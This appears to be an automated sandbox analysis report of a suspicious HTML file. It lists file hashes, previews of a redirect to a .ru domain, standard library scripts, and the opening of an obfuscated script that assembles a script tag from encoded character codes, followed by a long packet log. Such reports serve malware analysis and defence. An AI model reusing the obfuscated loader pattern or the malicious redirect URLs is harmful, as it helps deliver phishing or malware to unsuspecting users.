                                                                                SHA-256:1FB54C9B53B4864D5F2E949780782CB14CBCBBE72B396CB1CF7F1FF0E6570D8A
                                                                                SHA-512:22D6E32F89A14581D6E7010CD1B34E7823A76EE8FCF74797C177B86320582F1739E472A9E51C607642419AF95B8C9C6868442E7AABCCD7FDCA459E1EA8995357
                                                                                Malicious:false
                                                                                URL:https://href.li/?https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/
                                                                                Preview:<!DOCTYPE html>.<html><head>.<title>href.li</title>.<meta http-equiv="Refresh" content="0; url=https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/" />.<meta name="referrer" content="no-referrer" />.<script type="text/javascript">./* <![CDATA[ */.window.location.replace( "https:\/\/9zg.aforenotedc.ru\/oBVboBDZoE8nn9Lnp8eBs\/" + window.location.hash );./* */.</script>.</head>.<body><p>Redirecting..<br /><a href="https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/">https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/</a></p></body></html>
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:downloaded
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                URL:https://3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru/992955768393598TcoooKWMQFRRVTWFRRYLUCPRWPCDYMYFKPHJKQLEDFPAIMQBMIMJDUCSR
                                                                                Preview:1
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (47261)
                                                                                Category:downloaded
                                                                                Size (bytes):47262
                                                                                Entropy (8bit):5.3974731018213795
                                                                                Encrypted:false
                                                                                SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                Malicious:false
                                                                                URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                                                                Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                Category:downloaded
                                                                                Size (bytes):89501
                                                                                Entropy (8bit):5.289893677458563
                                                                                Encrypted:false
                                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                Malicious:false
                                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65451)
                                                                                Category:dropped
                                                                                Size (bytes):89476
                                                                                Entropy (8bit):5.2896589255084425
                                                                                Encrypted:false
                                                                                SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                Malicious:false
                                                                                Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):61
                                                                                Entropy (8bit):3.990210155325004
                                                                                Encrypted:false
                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                Malicious:false
                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1
                                                                                File type:HTML document, ASCII text, with very long lines (65533)
                                                                                Entropy (8bit):2.857681546811352
                                                                                TrID:
                                                                                  File name:27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html
                                                                                  File size:126'906 bytes
                                                                                  MD5:cde00cb2b65ee286fec3017beb953795
                                                                                  SHA1:eabfaa69c1e3b6a04d17c76987becd63b5b78076
                                                                                  SHA256:287691ade84c692b9ea3af2bee22096d13584c817fcb7c908c3c4c17c582aa5f
                                                                                  SHA512:908fc35ccfb25ae5507e1a9ec547473c2d6f7bbc9be74ccb07e8b55edd6613419640720e42bdfef5b8515a1fde8dab941a061f8b5d4d4d8f9b2a37cffa7283d3
                                                                                  SSDEEP:3072:1tBs4LTqM4Hn0XUzMPVicWX00bijjqIotxOO6/G7zd/XrXkrsz2oOIhuXhiiGI54:1tBs4LTqM4Hn0XUzMPVicWX00bijjqI0
                                                                                  TLSH:47C36B70E2E18D32F44E8D615038BC7FAEE57486E2A55EE636EA63D05ECBFDD0484844
                                                                                  File Content Preview:....</script/script><script ~~~>.let arr = ['3c', '1110011', '1100011', '72', '1101001', '70', '74', '20', '1110011', '72', '1100011', '111101', '22', '68', '74', '74', '70', '1110011', '3a', '101111', '101111', '1100011', '64', '6e', '6a', '1110011', '2e
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 2, 2024 17:49:19.121299028 CEST49675443192.168.2.4173.222.162.32
                                                                                  Oct 2, 2024 17:49:35.108243942 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.108283997 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.108341932 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.108639956 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.108659983 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.220283031 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:35.220321894 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.220388889 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:35.222490072 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:35.222515106 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.584760904 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.585370064 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.585427046 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.587022066 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.587100029 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.599345922 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.599569082 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.599996090 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.600029945 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.654136896 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.711612940 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.711667061 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.711713076 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.711739063 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.711760998 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.711766958 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.711779118 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.711800098 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.711826086 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.711838961 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.711898088 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.711945057 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.711952925 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.712229967 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.712258101 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.712292910 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.712302923 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.712357998 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.716263056 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.763560057 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.797729969 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.797903061 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.797930002 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.797980070 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.797995090 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.798044920 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.798193932 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.798331022 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.798361063 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.798386097 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.798399925 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.798410892 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.798427105 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.799032927 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.799058914 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.799108028 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.799114943 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.799156904 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.799309015 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.799453974 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.799479008 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.799503088 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.799535036 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.799542904 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.799556017 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.800616980 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.800663948 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.800697088 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.800700903 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.800712109 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.800739050 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.801038980 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.801093102 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.801100016 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.840903044 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.884748936 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.884872913 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.884989977 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.885662079 CEST49738443192.168.2.4104.17.25.14
                                                                                  Oct 2, 2024 17:49:35.885679007 CEST44349738104.17.25.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.896753073 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.896905899 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:35.926762104 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:35.926820993 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.927177906 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.967403889 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:35.968852997 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:35.968908072 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.968985081 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:35.971411943 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:35.971434116 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.023441076 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:36.071399927 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.245804071 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.245831013 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.245839119 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.245848894 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.245871067 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.245923042 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:36.245951891 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.246077061 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.246129036 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:36.246129036 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:36.246129036 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:36.246141911 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.246177912 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:36.246412039 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.246463060 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.247081995 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:36.257388115 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:36.257416964 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.257549047 CEST49739443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:49:36.257556915 CEST4434973913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.436317921 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.436717033 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.436736107 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.437750101 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.437813044 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.438251019 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.438316107 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.438349009 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.479409933 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.527008057 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.527044058 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579071999 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579093933 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579133987 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579150915 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.579165936 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579190016 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.579201937 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579232931 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579241991 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.579247952 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579317093 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.579323053 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579691887 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579704046 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579750061 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.579757929 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.579860926 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.583760023 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.636332035 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.667694092 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.667876005 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.667959929 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.667999983 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.668021917 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.668065071 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.668071985 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.668149948 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.668221951 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.668222904 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.668252945 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.668303013 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.668332100 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.668801069 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.668868065 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.668879032 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.669258118 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.669329882 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.669428110 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.669434071 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.669451952 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.669538975 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.669547081 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.669750929 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.669756889 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.670383930 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.670463085 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.670466900 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.670504093 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.670624971 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.670663118 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.670676947 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.670763969 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.670769930 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.756201029 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.756313086 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.756341934 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.756439924 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.756490946 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.756676912 CEST49745443192.168.2.4104.17.24.14
                                                                                  Oct 2, 2024 17:49:36.756692886 CEST44349745104.17.24.14192.168.2.4
                                                                                  Oct 2, 2024 17:49:37.531488895 CEST49747443192.168.2.4192.0.78.27
                                                                                  Oct 2, 2024 17:49:37.531548023 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:37.531680107 CEST49747443192.168.2.4192.0.78.27
                                                                                  Oct 2, 2024 17:49:37.531856060 CEST49747443192.168.2.4192.0.78.27
                                                                                  Oct 2, 2024 17:49:37.531879902 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.018534899 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.019001007 CEST49747443192.168.2.4192.0.78.27
                                                                                  Oct 2, 2024 17:49:38.019017935 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.019673109 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.019733906 CEST49747443192.168.2.4192.0.78.27
                                                                                  Oct 2, 2024 17:49:38.020370007 CEST44349747192.0.78.27192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.020416021 CEST49747443192.168.2.4192.0.78.27
                                                                                  Oct 2, 2024 17:49:38.022346020 CEST49747443192.168.2.4192.0.78.27
